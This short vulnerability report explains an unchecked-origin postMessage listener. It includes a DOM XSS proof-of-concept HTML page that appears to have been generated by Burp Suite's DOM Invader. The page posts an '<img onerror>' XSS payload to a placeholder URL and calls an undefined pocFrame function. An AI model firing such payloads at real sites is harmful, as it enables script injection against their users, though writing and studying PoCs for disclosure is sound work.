specifically in the event listener of postMessage requests that do not check the origin before accessing data. As a result, an attacker can exploit this vulnerability by sending malicious data to your application from a null (sandboxed iframe) and pretending that it came from a trusted source. This could lead to a number of security risks such as data theft or other malicious activities.
<!doctype html>
<html>
<head>
<!-- DOM XSS PoC - generated by DOM Invader part of Burp Suite -->
<meta charset="UTF-8" />
<title>Postmessage PoC</title>
<script>
function pocLink() {
var ref = window.open('https://url');
ref.postMessage("<img src=x onerror=alert('pwnwed'>","https://url");
}
</script>
</head>
<body>
<a href="#" onclick="pocLink();">PoC link</a>
<iframe src="https://url" onload="pocFrame(this.contentWindow)"></iframe>
</body>
</html>